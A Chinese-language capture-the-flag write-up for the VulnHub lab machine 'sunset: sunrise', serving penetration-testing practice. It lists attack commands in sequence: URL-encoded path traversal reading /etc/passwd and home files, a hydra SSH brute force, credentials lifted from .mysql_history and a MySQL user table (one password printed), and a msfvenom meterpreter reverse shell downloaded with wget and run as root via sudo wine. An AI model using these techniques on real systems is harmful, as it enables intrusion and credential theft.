[vulnhub]sunset: sunrise Writeup

个人博客地址

http://www.darkerbox.com

欢迎大家学习交流

靶机网址：

https://www.vulnhub.com/entry/sunset-sunrise,406/

靶机知识点：

靶机IP：192.168.2.129
kali IP：192.168.2.126

信息收集

nmap -sV -p- 192.168.2.129

扫目录发现啥也没有

访问8080端口，很明显的目录遍历漏洞。

漏洞利用

通过这个漏洞读取/etc/passwd文件。斜杠需要经过url编码。

http://192.168.2.129:8080/..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

发现用户weborf

使用hydra 爆破

hydra -l weborf -P /usr/share/wordlists/rockyou.txt 192.168.2.129 ssh

等了几分钟，啥也没有。

还是继续去目录遍历吧。
去home下看看。

http://192.168.2.129:8080/..%2f..%2f..%2f..%2f..%2f..%2fhome%2f

有两个目录。先去第一个。

http://192.168.2.129:8080/..%2f..%2f..%2f..%2f..%2f..%2fhome%2fsunrise%2f

发现user.txt。

http://192.168.2.129:8080/..%2f..%2f..%2f..%2f..%2f..%2fhome%2fsunrise%2fuser.txt
第二个目录weborf

http://192.168.2.129:8080/..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f

里面我看过了，没啥东西。

dirb扫描home/weborf下的文件。可能会有隐藏文件

dirb http://192.168.2.129:8080/..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f

看到.mysql_history文件
访问它。

http://192.168.2.129:8080/..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f.mysql_history

看见数据库的账号和密码
尝试ssh登陆，登陆成功

权限提升

mysql -u weborf -p
use mysql
select user,password from user;

得到sunrise的密码thefutureissobrightigottawearshades

sudo -l

查看可以以root执行wine命令，wine可以执行exe程序。
先在kali中生成exe程序

msfvenom -p windows/meterpreter/reverse_tcp -f exe   --platform windows -a x86 LHOST=192.168.2.126 LPORT=6666 -o /root/Desktop/payload.exe
python3 -m http.server

在靶机中下载

cd /tmp
wget http://192.168.2.126:8000/payload.exe

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.126
set LPORT 6666
exploit

在靶机运行

sudo wine payload.exe

欢迎大家一起学习交流，共同进步，欢迎加入信息安全小白群